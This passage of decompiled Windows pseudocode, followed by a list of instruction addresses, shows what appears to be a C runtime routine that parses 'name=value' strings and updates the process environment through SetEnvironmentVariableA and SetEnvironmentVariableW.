                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t116;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      				signed int _t122;
                                                                      				signed int _t123;
                                                                      				signed int _t126;
                                                                      				signed int _t127;
                                                                      				signed int _t131;
                                                                      				signed int _t133;
                                                                      				signed int _t136;
                                                                      				signed int _t138;
                                                                      				signed int _t139;
                                                                      				signed int _t142;
                                                                      				void* _t143;
                                                                      				signed int _t148;
                                                                      				signed int* _t150;
                                                                      				signed int* _t156;
                                                                      				signed int _t163;
                                                                      				signed int _t165;
                                                                      				signed int _t167;
                                                                      				intOrPtr _t168;
                                                                      				signed int _t173;
                                                                      				signed int _t175;
                                                                      				signed int _t176;
                                                                      				signed int _t180;
                                                                      				signed int _t185;
                                                                      				intOrPtr* _t186;
                                                                      				signed int _t191;
                                                                      				signed int _t196;
                                                                      				signed int _t197;
                                                                      				signed int _t204;
                                                                      				intOrPtr* _t205;
                                                                      				signed int _t214;
                                                                      				signed int _t215;
                                                                      				signed int _t217;
                                                                      				signed int _t218;
                                                                      				signed int _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t223;
                                                                      				intOrPtr _t225;
                                                                      				void* _t231;
                                                                      				signed int _t233;
                                                                      				void* _t236;
                                                                      				signed int _t237;
                                                                      				signed int _t238;
                                                                      				void* _t241;
                                                                      				signed int _t244;
                                                                      				signed int _t246;
                                                                      				void* _t252;
                                                                      				signed int _t253;
                                                                      				signed int _t254;
                                                                      				void* _t260;
                                                                      				void* _t262;
                                                                      				signed int _t263;
                                                                      				intOrPtr* _t267;
                                                                      				intOrPtr* _t271;
                                                                      				signed int _t274;
                                                                      				signed int _t276;
                                                                      				signed int _t280;
                                                                      				signed int _t282;
                                                                      				void* _t283;
                                                                      				void* _t284;
                                                                      				void* _t285;
                                                                      				signed int _t286;
                                                                      				signed int _t288;
                                                                      				signed int _t290;
                                                                      				signed int _t291;
                                                                      				signed int* _t292;
                                                                      				signed int _t298;
                                                                      				signed int _t299;
                                                                      				CHAR* _t300;
                                                                      				signed int _t302;
                                                                      				signed int _t303;
                                                                      				WCHAR* _t304;
                                                                      				signed int _t305;
                                                                      				signed int _t306;
                                                                      				signed int* _t307;
                                                                      				signed int _t308;
                                                                      				signed int _t310;
                                                                      				void* _t316;
                                                                      				void* _t317;
                                                                      				void* _t318;
                                                                      				void* _t320;
                                                                      				void* _t321;
                                                                      				void* _t322;
                                                                      				void* _t323;
                                                                      
                                                                      				_t217 = _a4;
                                                                      				if(_t217 != 0) {
                                                                      					_t286 = _t217;
                                                                      					_t116 = E004351F0(_t217, 0x3d);
                                                                      					_v16 = _t116;
                                                                      					_t231 = _t285;
                                                                      					__eflags = _t116;
                                                                      					if(_t116 == 0) {
                                                                      						L10:
                                                                      						 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      						goto L11;
                                                                      					} else {
                                                                      						__eflags = _t116 - _t217;
                                                                      						if(_t116 == _t217) {
                                                                      							goto L10;
                                                                      						} else {
                                                                      							__eflags =  *((char*)(_t116 + 1));
                                                                      							_t298 =  *0x46d4d0; // 0x11ec7e0
                                                                      							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                                                                      							_v5 = _t120;
                                                                      							__eflags = _t298 -  *0x46d4dc; // 0x11ec7e0
                                                                      							if(__eflags == 0) {
                                                                      								L87();
                                                                      								_t298 = _t120;
                                                                      								_t120 = _v5;
                                                                      								_t231 = _t298;
                                                                      								 *0x46d4d0 = _t298;
                                                                      							}
                                                                      							_t218 = 0;
                                                                      							__eflags = _t298;
                                                                      							if(_t298 != 0) {
                                                                      								L21:
                                                                      								_t233 = _t286;
                                                                      								_t122 = _v16 - _t233;
                                                                      								_push(_t122);
                                                                      								_push(_t233);
                                                                      								L121();
                                                                      								_v12 = _t122;
                                                                      								__eflags = _t122;
                                                                      								if(_t122 < 0) {
                                                                      									L29:
                                                                      									__eflags = _v5 - _t218;
                                                                      									if(_v5 != _t218) {
                                                                      										goto L12;
                                                                      									} else {
                                                                      										_t123 =  ~_t122;
                                                                      										_v12 = _t123;
                                                                      										_t27 = _t123 + 2; // 0x2
                                                                      										_t236 = _t27;
                                                                      										__eflags = _t236 - _t123;
                                                                      										if(_t236 < _t123) {
                                                                      											goto L11;
                                                                      										} else {
                                                                      											__eflags = _t236 - 0x3fffffff;
                                                                      											if(_t236 >= 0x3fffffff) {
                                                                      												goto L11;
                                                                      											} else {
                                                                      												_push(4);
                                                                      												_push(_t236);
                                                                      												_t299 = E0044B846(_t298);
                                                                      												E004427C2(_t218);
                                                                      												_t320 = _t320 + 0x10;
                                                                      												__eflags = _t299;
                                                                      												if(_t299 == 0) {
                                                                      													goto L11;
                                                                      												} else {
                                                                      													_t237 = _v12;
                                                                      													_t286 = _t218;
                                                                      													_t126 = _a4;
                                                                      													 *(_t299 + _t237 * 4) = _t126;
                                                                      													 *(_t299 + 4 + _t237 * 4) = _t218;
                                                                      													goto L34;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									__eflags =  *_t298 - _t218;
                                                                      									if( *_t298 == _t218) {
                                                                      										goto L29;
                                                                      									} else {
                                                                      										E004427C2( *((intOrPtr*)(_t298 + _t122 * 4)));
                                                                      										_t282 = _v12;
                                                                      										__eflags = _v5 - _t218;
                                                                      										if(_v5 != _t218) {
                                                                      											while(1) {
                                                                      												__eflags =  *(_t298 + _t282 * 4) - _t218;
                                                                      												if( *(_t298 + _t282 * 4) == _t218) {
                                                                      													break;
                                                                      												}
                                                                      												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                                                                      												_t282 = _t282 + 1;
                                                                      												__eflags = _t282;
                                                                      											}
                                                                      											_push(4);
                                                                      											_push(_t282);
                                                                      											_t299 = E0044B846(_t298);
                                                                      											E004427C2(_t218);
                                                                      											_t320 = _t320 + 0x10;
                                                                      											_t126 = _t286;
                                                                      											__eflags = _t299;
                                                                      											if(_t299 != 0) {
                                                                      												L34:
                                                                      												 *0x46d4d0 = _t299;
                                                                      											}
                                                                      										} else {
                                                                      											_t126 = _a4;
                                                                      											_t286 = _t218;
                                                                      											 *(_t298 + _t282 * 4) = _t126;
                                                                      										}
                                                                      										__eflags = _a8 - _t218;
                                                                      										if(_a8 == _t218) {
                                                                      											goto L12;
                                                                      										} else {
                                                                      											_t238 = _t126;
                                                                      											_t283 = _t238 + 1;
                                                                      											do {
                                                                      												_t127 =  *_t238;
                                                                      												_t238 = _t238 + 1;
                                                                      												__eflags = _t127;
                                                                      											} while (_t127 != 0);
                                                                      											_v12 = _t238 - _t283 + 2;
                                                                      											_t300 = E00441BB3(_t238 - _t283, _t238 - _t283 + 2, 1);
                                                                      											_pop(_t241);
                                                                      											__eflags = _t300;
                                                                      											if(_t300 == 0) {
                                                                      												L42:
                                                                      												E004427C2(_t300);
                                                                      												goto L12;
                                                                      											} else {
                                                                      												_t131 = E0043DAD7(_t300, _v12, _a4);
                                                                      												_t321 = _t320 + 0xc;
                                                                      												__eflags = _t131;
                                                                      												if(_t131 != 0) {
                                                                      													_push(_t218);
                                                                      													_push(_t218);
                                                                      													_push(_t218);
                                                                      													_push(_t218);
                                                                      													_push(_t218);
                                                                      													E00438659();
                                                                      													asm("int3");
                                                                      													_t316 = _t321;
                                                                      													_t322 = _t321 - 0xc;
                                                                      													_push(_t218);
                                                                      													_t220 = _v44;
                                                                      													__eflags = _t220;
                                                                      													if(_t220 != 0) {
                                                                      														_push(_t300);
                                                                      														_push(_t286);
                                                                      														_push(0x3d);
                                                                      														_t288 = _t220;
                                                                      														_t133 = E004536E7(_t241);
                                                                      														_v20 = _t133;
                                                                      														_t244 = _t220;
                                                                      														__eflags = _t133;
                                                                      														if(_t133 == 0) {
                                                                      															L54:
                                                                      															 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      															goto L55;
                                                                      														} else {
                                                                      															__eflags = _t133 - _t220;
                                                                      															if(_t133 == _t220) {
                                                                      																goto L54;
                                                                      															} else {
                                                                      																_t302 =  *0x46d4d4; // 0x11ef008
                                                                      																_t221 = 0;
                                                                      																__eflags =  *(_t133 + 2);
                                                                      																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                                                                      																_v9 = _t246;
                                                                      																__eflags = _t302 -  *0x46d4d8; // 0x11e4730
                                                                      																if(__eflags == 0) {
                                                                      																	_push(_t302);
                                                                      																	L104();
                                                                      																	_t246 = _v9;
                                                                      																	_t302 = _t133;
                                                                      																	 *0x46d4d4 = _t302;
                                                                      																}
                                                                      																__eflags = _t302;
                                                                      																if(_t302 != 0) {
                                                                      																	L64:
                                                                      																	_v20 = _v20 - _t288 >> 1;
                                                                      																	_t138 = E0044B7D9(_t288, _v20 - _t288 >> 1);
                                                                      																	_v16 = _t138;
                                                                      																	__eflags = _t138;
                                                                      																	if(_t138 < 0) {
                                                                      																		L72:
                                                                      																		__eflags = _v9 - _t221;
                                                                      																		if(_v9 != _t221) {
                                                                      																			goto L56;
                                                                      																		} else {
                                                                      																			_t139 =  ~_t138;
                                                                      																			_v16 = _t139;
                                                                      																			_t72 = _t139 + 2; // 0x2
                                                                      																			_t252 = _t72;
                                                                      																			__eflags = _t252 - _t139;
                                                                      																			if(_t252 < _t139) {
                                                                      																				goto L55;
                                                                      																			} else {
                                                                      																				__eflags = _t252 - 0x3fffffff;
                                                                      																				if(_t252 >= 0x3fffffff) {
                                                                      																					goto L55;
                                                                      																				} else {
                                                                      																					_push(4);
                                                                      																					_push(_t252);
                                                                      																					_t303 = E0044B846(_t302);
                                                                      																					E004427C2(_t221);
                                                                      																					_t322 = _t322 + 0x10;
                                                                      																					__eflags = _t303;
                                                                      																					if(_t303 == 0) {
                                                                      																						goto L55;
                                                                      																					} else {
                                                                      																						_t253 = _v16;
                                                                      																						_t288 = _t221;
                                                                      																						_t142 = _v0;
                                                                      																						 *(_t303 + _t253 * 4) = _t142;
                                                                      																						 *(_t303 + 4 + _t253 * 4) = _t221;
                                                                      																						goto L77;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																	} else {
                                                                      																		__eflags =  *_t302 - _t221;
                                                                      																		if( *_t302 == _t221) {
                                                                      																			goto L72;
                                                                      																		} else {
                                                                      																			E004427C2( *((intOrPtr*)(_t302 + _t138 * 4)));
                                                                      																			_t276 = _v16;
                                                                      																			__eflags = _v9 - _t221;
                                                                      																			if(_v9 != _t221) {
                                                                      																				while(1) {
                                                                      																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                                                                      																					if( *(_t302 + _t276 * 4) == _t221) {
                                                                      																						break;
                                                                      																					}
                                                                      																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                                                                      																					_t276 = _t276 + 1;
                                                                      																					__eflags = _t276;
                                                                      																				}
                                                                      																				_push(4);
                                                                      																				_push(_t276);
                                                                      																				_t303 = E0044B846(_t302);
                                                                      																				E004427C2(_t221);
                                                                      																				_t322 = _t322 + 0x10;
                                                                      																				_t142 = _t288;
                                                                      																				__eflags = _t303;
                                                                      																				if(_t303 != 0) {
                                                                      																					L77:
                                                                      																					 *0x46d4d4 = _t303;
                                                                      																				}
                                                                      																			} else {
                                                                      																				_t142 = _v0;
                                                                      																				_t288 = _t221;
                                                                      																				 *(_t302 + _t276 * 4) = _t142;
                                                                      																			}
                                                                      																			__eflags = _a4 - _t221;
                                                                      																			if(_a4 == _t221) {
                                                                      																				goto L56;
                                                                      																			} else {
                                                                      																				_t254 = _t142;
                                                                      																				_t81 = _t254 + 2; // 0x2
                                                                      																				_t284 = _t81;
                                                                      																				do {
                                                                      																					_t143 =  *_t254;
                                                                      																					_t254 = _t254 + 2;
                                                                      																					__eflags = _t143 - _t221;
                                                                      																				} while (_t143 != _t221);
                                                                      																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                                                                      																				_v16 = _t82;
                                                                      																				_t304 = E00441BB3(_t254 - _t284 >> 1, _t82, 2);
                                                                      																				_pop(_t258);
                                                                      																				__eflags = _t304;
                                                                      																				if(_t304 == 0) {
                                                                      																					L85:
                                                                      																					E004427C2(_t304);
                                                                      																					goto L56;
                                                                      																				} else {
                                                                      																					_t148 = E00443BA1(_t304, _v16, _v0);
                                                                      																					_t323 = _t322 + 0xc;
                                                                      																					__eflags = _t148;
                                                                      																					if(_t148 != 0) {
                                                                      																						_push(_t221);
                                                                      																						_push(_t221);
                                                                      																						_push(_t221);
                                                                      																						_push(_t221);
                                                                      																						_push(_t221);
                                                                      																						E00438659();
                                                                      																						asm("int3");
                                                                      																						_push(_t316);
                                                                      																						_t317 = _t323;
                                                                      																						_push(_t288);
                                                                      																						_t290 = _v92;
                                                                      																						__eflags = _t290;
                                                                      																						if(_t290 != 0) {
                                                                      																							_t260 = 0;
                                                                      																							_t150 = _t290;
                                                                      																							__eflags =  *_t290;
                                                                      																							if( *_t290 != 0) {
                                                                      																								do {
                                                                      																									_t150 =  &(_t150[1]);
                                                                      																									_t260 = _t260 + 1;
                                                                      																									__eflags =  *_t150;
                                                                      																								} while ( *_t150 != 0);
                                                                      																							}
                                                                      																							_t93 = _t260 + 1; // 0x2
                                                                      																							_t305 = E00441BB3(_t260, _t93, 4);
                                                                      																							_t262 = _t304;
                                                                      																							__eflags = _t305;
                                                                      																							if(_t305 == 0) {
                                                                      																								L102:
                                                                      																								E004421B4(_t221, _t284, _t290, _t305);
                                                                      																								goto L103;
                                                                      																							} else {
                                                                      																								__eflags =  *_t290;
                                                                      																								if( *_t290 == 0) {
                                                                      																									L100:
                                                                      																									E004427C2(0);
                                                                      																									_t175 = _t305;
                                                                      																									goto L101;
                                                                      																								} else {
                                                                      																									_push(_t221);
                                                                      																									_t221 = _t305 - _t290;
                                                                      																									__eflags = _t221;
                                                                      																									do {
                                                                      																										_t271 =  *_t290;
                                                                      																										_t94 = _t271 + 1; // 0x5
                                                                      																										_t284 = _t94;
                                                                      																										do {
                                                                      																											_t176 =  *_t271;
                                                                      																											_t271 = _t271 + 1;
                                                                      																											__eflags = _t176;
                                                                      																										} while (_t176 != 0);
                                                                      																										_t262 = _t271 - _t284;
                                                                      																										_t95 = _t262 + 1; // 0x6
                                                                      																										_v16 = _t95;
                                                                      																										 *(_t221 + _t290) = E00441BB3(_t262, _t95, 1);
                                                                      																										E004427C2(0);
                                                                      																										_t323 = _t323 + 0xc;
                                                                      																										__eflags =  *(_t221 + _t290);
                                                                      																										if( *(_t221 + _t290) == 0) {
                                                                      																											goto L102;
                                                                      																										} else {
                                                                      																											_t180 = E0043DAD7( *(_t221 + _t290), _v16,  *_t290);
                                                                      																											_t323 = _t323 + 0xc;
                                                                      																											__eflags = _t180;
                                                                      																											if(_t180 != 0) {
                                                                      																												L103:
                                                                      																												_push(0);
                                                                      																												_push(0);
                                                                      																												_push(0);
                                                                      																												_push(0);
                                                                      																												_push(0);
                                                                      																												E00438659();
                                                                      																												asm("int3");
                                                                      																												_push(_t317);
                                                                      																												_t318 = _t323;
                                                                      																												_push(_t262);
                                                                      																												_push(_t262);
                                                                      																												_push(_t290);
                                                                      																												_t291 = _v128;
                                                                      																												__eflags = _t291;
                                                                      																												if(_t291 != 0) {
                                                                      																													_push(_t221);
                                                                      																													_t223 = 0;
                                                                      																													_t156 = _t291;
                                                                      																													_t263 = 0;
                                                                      																													_v20 = 0;
                                                                      																													_push(_t305);
                                                                      																													__eflags =  *_t291;
                                                                      																													if( *_t291 != 0) {
                                                                      																														do {
                                                                      																															_t156 =  &(_t156[1]);
                                                                      																															_t263 = _t263 + 1;
                                                                      																															__eflags =  *_t156;
                                                                      																														} while ( *_t156 != 0);
                                                                      																													}
                                                                      																													_t104 = _t263 + 1; // 0x2
                                                                      																													_t306 = E00441BB3(_t263, _t104, 4);
                                                                      																													__eflags = _t306;
                                                                      																													if(_t306 == 0) {
                                                                      																														L119:
                                                                      																														E004421B4(_t223, _t284, _t291, _t306);
                                                                      																														goto L120;
                                                                      																													} else {
                                                                      																														__eflags =  *_t291 - _t223;
                                                                      																														if( *_t291 == _t223) {
                                                                      																															L117:
                                                                      																															E004427C2(_t223);
                                                                      																															_t167 = _t306;
                                                                      																															goto L118;
                                                                      																														} else {
                                                                      																															_t223 = _t306 - _t291;
                                                                      																															__eflags = _t223;
                                                                      																															do {
                                                                      																																_t267 =  *_t291;
                                                                      																																_t105 = _t267 + 2; // 0x6
                                                                      																																_t284 = _t105;
                                                                      																																do {
                                                                      																																	_t168 =  *_t267;
                                                                      																																	_t267 = _t267 + 2;
                                                                      																																	__eflags = _t168 - _v20;
                                                                      																																} while (_t168 != _v20);
                                                                      																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                                                                      																																_v24 = _t107;
                                                                      																																 *(_t223 + _t291) = E00441BB3(_t267 - _t284 >> 1, _t107, 2);
                                                                      																																E004427C2(0);
                                                                      																																_t323 = _t323 + 0xc;
                                                                      																																__eflags =  *(_t223 + _t291);
                                                                      																																if( *(_t223 + _t291) == 0) {
                                                                      																																	goto L119;
                                                                      																																} else {
                                                                      																																	_t173 = E00443BA1( *(_t223 + _t291), _v24,  *_t291);
                                                                      																																	_t323 = _t323 + 0xc;
                                                                      																																	__eflags = _t173;
                                                                      																																	if(_t173 != 0) {
                                                                      																																		L120:
                                                                      																																		_push(0);
                                                                      																																		_push(0);
                                                                      																																		_push(0);
                                                                      																																		_push(0);
                                                                      																																		_push(0);
                                                                      																																		E00438659();
                                                                      																																		asm("int3");
                                                                      																																		_push(_t318);
                                                                      																																		_push(_t223);
                                                                      																																		_push(_t306);
                                                                      																																		_push(_t291);
                                                                      																																		_t292 =  *0x46d4d0; // 0x11ec7e0
                                                                      																																		_t307 = _t292;
                                                                      																																		__eflags =  *_t292;
                                                                      																																		if( *_t292 == 0) {
                                                                      																																			L127:
                                                                      																																			_t308 = _t307 - _t292;
                                                                      																																			__eflags = _t308;
                                                                      																																			_t310 =  ~(_t308 >> 2);
                                                                      																																		} else {
                                                                      																																			_t225 = _v8;
                                                                      																																			do {
                                                                      																																				_t163 = E004459A9(_v12,  *_t307, _t225);
                                                                      																																				_t323 = _t323 + 0xc;
                                                                      																																				__eflags = _t163;
                                                                      																																				if(_t163 != 0) {
                                                                      																																					goto L126;
                                                                      																																				} else {
                                                                      																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                                                                      																																					__eflags = _t165 - 0x3d;
                                                                      																																					if(_t165 == 0x3d) {
                                                                      																																						L129:
                                                                      																																						_t310 = _t307 - _t292 >> 2;
                                                                      																																					} else {
                                                                      																																						__eflags = _t165;
                                                                      																																						if(_t165 == 0) {
                                                                      																																							goto L129;
                                                                      																																						} else {
                                                                      																																							goto L126;
                                                                      																																						}
                                                                      																																					}
                                                                      																																				}
                                                                      																																				goto L128;
                                                                      																																				L126:
                                                                      																																				_t307 =  &(_t307[1]);
                                                                      																																				__eflags =  *_t307;
                                                                      																																			} while ( *_t307 != 0);
                                                                      																																			goto L127;
                                                                      																																		}
                                                                      																																		L128:
                                                                      																																		return _t310;
                                                                      																																	} else {
                                                                      																																		goto L115;
                                                                      																																	}
                                                                      																																}
                                                                      																																goto L130;
                                                                      																																L115:
                                                                      																																_t291 = _t291 + 4;
                                                                      																																__eflags =  *_t291 - _t173;
                                                                      																															} while ( *_t291 != _t173);
                                                                      																															_t223 = 0;
                                                                      																															__eflags = 0;
                                                                      																															goto L117;
                                                                      																														}
                                                                      																													}
                                                                      																												} else {
                                                                      																													_t167 = 0;
                                                                      																													L118:
                                                                      																													return _t167;
                                                                      																												}
                                                                      																											} else {
                                                                      																												goto L98;
                                                                      																											}
                                                                      																										}
                                                                      																										goto L130;
                                                                      																										L98:
                                                                      																										_t290 = _t290 + 4;
                                                                      																										__eflags =  *_t290 - _t180;
                                                                      																									} while ( *_t290 != _t180);
                                                                      																									goto L100;
                                                                      																								}
                                                                      																							}
                                                                      																						} else {
                                                                      																							_t175 = 0;
                                                                      																							L101:
                                                                      																							return _t175;
                                                                      																						}
                                                                      																					} else {
                                                                      																						_t274 =  &(_t304[_v20 + 1]);
                                                                      																						 *(_t274 - 2) = _t148;
                                                                      																						asm("sbb eax, eax");
                                                                      																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                                                                      																						__eflags = _t185;
                                                                      																						if(_t185 == 0) {
                                                                      																							_t186 = E00439941();
                                                                      																							_t221 = _t221 | 0xffffffff;
                                                                      																							__eflags = _t221;
                                                                      																							 *_t186 = 0x2a;
                                                                      																						}
                                                                      																						goto L85;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	_t191 =  *0x46d4d0; // 0x11ec7e0
                                                                      																	__eflags = _a4 - _t221;
                                                                      																	if(_a4 == _t221) {
                                                                      																		L58:
                                                                      																		__eflags = _t246;
                                                                      																		if(_t246 != 0) {
                                                                      																			goto L56;
                                                                      																		} else {
                                                                      																			__eflags = _t191;
                                                                      																			if(_t191 != 0) {
                                                                      																				L62:
                                                                      																				 *0x46d4d4 = E00441BB3(_t246, 1, 4);
                                                                      																				E004427C2(_t221);
                                                                      																				_t322 = _t322 + 0xc;
                                                                      																				goto L63;
                                                                      																			} else {
                                                                      																				 *0x46d4d0 = E00441BB3(_t246, 1, 4);
                                                                      																				E004427C2(_t221);
                                                                      																				_t322 = _t322 + 0xc;
                                                                      																				__eflags =  *0x46d4d0 - _t221; // 0x11ec7e0
                                                                      																				if(__eflags == 0) {
                                                                      																					goto L55;
                                                                      																				} else {
                                                                      																					_t302 =  *0x46d4d4; // 0x11ef008
                                                                      																					__eflags = _t302;
                                                                      																					if(_t302 != 0) {
                                                                      																						goto L64;
                                                                      																					} else {
                                                                      																						goto L62;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																	} else {
                                                                      																		__eflags = _t191;
                                                                      																		if(_t191 == 0) {
                                                                      																			goto L58;
                                                                      																		} else {
                                                                      																			_t196 = L0043FC85(_t221);
                                                                      																			__eflags = _t196;
                                                                      																			if(_t196 != 0) {
                                                                      																				L63:
                                                                      																				_t302 =  *0x46d4d4; // 0x11ef008
                                                                      																				__eflags = _t302;
                                                                      																				if(_t302 == 0) {
                                                                      																					L55:
                                                                      																					_t221 = _t220 | 0xffffffff;
                                                                      																					__eflags = _t221;
                                                                      																					L56:
                                                                      																					E004427C2(_t288);
                                                                      																					_t136 = _t221;
                                                                      																					goto L57;
                                                                      																				} else {
                                                                      																					goto L64;
                                                                      																				}
                                                                      																			} else {
                                                                      																				goto L54;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t197 = E00439941();
                                                                      														 *_t197 = 0x16;
                                                                      														_t136 = _t197 | 0xffffffff;
                                                                      														L57:
                                                                      														return _t136;
                                                                      													}
                                                                      												} else {
                                                                      													_t280 = _v16 + 1 + _t300 - _a4;
                                                                      													asm("sbb eax, eax");
                                                                      													 *(_t280 - 1) = _t218;
                                                                      													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                                                                      													__eflags = _t204;
                                                                      													if(_t204 == 0) {
                                                                      														_t205 = E00439941();
                                                                      														_t218 = _t218 | 0xffffffff;
                                                                      														__eflags = _t218;
                                                                      														 *_t205 = 0x2a;
                                                                      													}
                                                                      													goto L42;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = _a8;
                                                                      								if(_a8 == 0) {
                                                                      									L14:
                                                                      									__eflags = _t120;
                                                                      									if(_t120 == 0) {
                                                                      										 *0x46d4d0 = E00441BB3(_t231, 1, 4);
                                                                      										E004427C2(_t218);
                                                                      										_t298 =  *0x46d4d0; // 0x11ec7e0
                                                                      										_t320 = _t320 + 0xc;
                                                                      										__eflags = _t298;
                                                                      										if(_t298 == 0) {
                                                                      											goto L11;
                                                                      										} else {
                                                                      											__eflags =  *0x46d4d4 - _t218; // 0x11ef008
                                                                      											if(__eflags != 0) {
                                                                      												goto L20;
                                                                      											} else {
                                                                      												 *0x46d4d4 = E00441BB3(_t231, 1, 4);
                                                                      												E004427C2(_t218);
                                                                      												_t320 = _t320 + 0xc;
                                                                      												__eflags =  *0x46d4d4 - _t218; // 0x11ef008
                                                                      												if(__eflags == 0) {
                                                                      													goto L11;
                                                                      												} else {
                                                                      													goto L19;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_t218 = 0;
                                                                      										goto L12;
                                                                      									}
                                                                      								} else {
                                                                      									__eflags =  *0x46d4d4 - _t218; // 0x11ef008
                                                                      									if(__eflags == 0) {
                                                                      										goto L14;
                                                                      									} else {
                                                                      										_t214 = L0043FC80(0);
                                                                      										__eflags = _t214;
                                                                      										if(_t214 != 0) {
                                                                      											L19:
                                                                      											_t298 =  *0x46d4d0; // 0x11ec7e0
                                                                      											L20:
                                                                      											__eflags = _t298;
                                                                      											if(_t298 == 0) {
                                                                      												L11:
                                                                      												_t218 = _t217 | 0xffffffff;
                                                                      												__eflags = _t218;
                                                                      												L12:
                                                                      												E004427C2(_t286);
                                                                      												_t119 = _t218;
                                                                      												goto L13;
                                                                      											} else {
                                                                      												goto L21;
                                                                      											}
                                                                      										} else {
                                                                      											goto L10;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_t215 = E00439941();
                                                                      					 *_t215 = 0x16;
                                                                      					_t119 = _t215 | 0xffffffff;
                                                                      					L13:
                                                                      					return _t119;
                                                                      				}
                                                                      				L130:
                                                                      			}
                                                                      0x0044b70f
                                                                      0x0044b711
                                                                      0x0044b711
                                                                      0x0044b714
                                                                      0x0044b714
                                                                      0x0044b717
                                                                      0x0044b71a
                                                                      0x0044b71a
                                                                      0x0044b726
                                                                      0x0044b72a
                                                                      0x0044b732
                                                                      0x0044b738
                                                                      0x0044b73d
                                                                      0x0044b740
                                                                      0x0044b744
                                                                      0x00000000
                                                                      0x0044b746
                                                                      0x0044b74e
                                                                      0x0044b753
                                                                      0x0044b756
                                                                      0x0044b758
                                                                      0x0044b778
                                                                      0x0044b77a
                                                                      0x0044b77b
                                                                      0x0044b77c
                                                                      0x0044b77d
                                                                      0x0044b77e
                                                                      0x0044b77f
                                                                      0x0044b784
                                                                      0x0044b787
                                                                      0x0044b78a
                                                                      0x0044b78b
                                                                      0x0044b78c
                                                                      0x0044b78d
                                                                      0x0044b793
                                                                      0x0044b795
                                                                      0x0044b798
                                                                      0x0044b7c4
                                                                      0x0044b7c4
                                                                      0x0044b7c4
                                                                      0x0044b7c9
                                                                      0x0044b79a
                                                                      0x0044b79a
                                                                      0x0044b79d
                                                                      0x0044b7a3
                                                                      0x0044b7a8
                                                                      0x0044b7ab
                                                                      0x0044b7ad
                                                                      0x00000000
                                                                      0x0044b7af
                                                                      0x0044b7b1
                                                                      0x0044b7b4
                                                                      0x0044b7b6
                                                                      0x0044b7d2
                                                                      0x0044b7d4
                                                                      0x0044b7b8
                                                                      0x0044b7b8
                                                                      0x0044b7ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044b7ba
                                                                      0x0044b7b6
                                                                      0x00000000
                                                                      0x0044b7bc
                                                                      0x0044b7bc
                                                                      0x0044b7bf
                                                                      0x0044b7bf
                                                                      0x00000000
                                                                      0x0044b79d
                                                                      0x0044b7cb
                                                                      0x0044b7d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044b758
                                                                      0x00000000
                                                                      0x0044b75a
                                                                      0x0044b75a
                                                                      0x0044b75d
                                                                      0x0044b75d
                                                                      0x0044b761
                                                                      0x0044b761
                                                                      0x00000000
                                                                      0x0044b761
                                                                      0x0044b709
                                                                      0x0044b6d6
                                                                      0x0044b6d6
                                                                      0x0044b76e
                                                                      0x0044b772
                                                                      0x0044b772
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044b69b
                                                                      0x00000000
                                                                      0x0044b69d
                                                                      0x0044b69d
                                                                      0x0044b6a0
                                                                      0x0044b6a0
                                                                      0x00000000
                                                                      0x0044b6a4
                                                                      0x0044b653
                                                                      0x0044b624
                                                                      0x0044b624
                                                                      0x0044b6b0
                                                                      0x0044b6b4
                                                                      0x0044b6b4
                                                                      0x0044b5ce
                                                                      0x0044b5d2
                                                                      0x0044b5d5
                                                                      0x0044b5df
                                                                      0x0044b5e7
                                                                      0x0044b5ed
                                                                      0x0044b5ef
                                                                      0x0044b5f1
                                                                      0x0044b5f6
                                                                      0x0044b5f6
                                                                      0x0044b5f9
                                                                      0x0044b5f9
                                                                      0x00000000
                                                                      0x0044b5ef
                                                                      0x0044b5cc
                                                                      0x0044b5b8
                                                                      0x0044b58a
                                                                      0x0044b4eb
                                                                      0x0044b446
                                                                      0x0044b446
                                                                      0x0044b44b
                                                                      0x0044b44e
                                                                      0x0044b47b
                                                                      0x0044b47b
                                                                      0x0044b47d
                                                                      0x00000000
                                                                      0x0044b47f
                                                                      0x0044b47f
                                                                      0x0044b481
                                                                      0x0044b4ac
                                                                      0x0044b4b6
                                                                      0x0044b4bb
                                                                      0x0044b4c0
                                                                      0x00000000
                                                                      0x0044b483
                                                                      0x0044b48d
                                                                      0x0044b492
                                                                      0x0044b497
                                                                      0x0044b49a
                                                                      0x0044b4a0
                                                                      0x00000000
                                                                      0x0044b4a2
                                                                      0x0044b4a2
                                                                      0x0044b4a8
                                                                      0x0044b4aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
